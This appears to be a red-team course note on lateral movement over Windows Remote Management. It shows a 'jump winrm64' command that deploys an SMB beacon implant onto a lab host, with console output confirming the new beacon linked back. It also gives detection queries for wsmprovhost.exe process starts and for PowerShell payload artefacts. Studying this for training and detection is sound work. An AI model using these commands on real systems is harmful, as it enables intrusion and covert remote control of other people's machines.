Windows Remote Management

The winrm and winrm64 methods can be used for 32 and 64-bit targets as appropriate.

The SMB Beacon is an excellent choice when moving laterally, because the SMB protocol is used extensively in a Windows environment, so this traffic blends in very well.

beacon> jump winrm64 web.dev.cyberbotic.io smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10) on web.dev.cyberbotic.io via WinRM
[+] host called home, sent: 225172 bytes
[+] established link to child beacon: 10.10.122.30

\

WinRM will return a high integrity Beacon running as the user with which you're interacting with the remote machine as.

\

\

This new Beacon will be running inside wsmprovhost.exe, which is the "Host process for WinRM plug-ins". This is used whenever WinRM is used, legitimate or otherwise. You can search for process start events, but this will produce a lot of false positives if WinRM is being used legitimately by system administrators.

event.category: process and event.type: start and process.name: wsmprovhost.exe

\

The most likely means of identifying this lateral movement is by searching PowerShell script block logs for known payload artefacts.

event.category: process and powershell.file.script_block_text: "$var_runme.Invoke([IntPtr]::Zero)"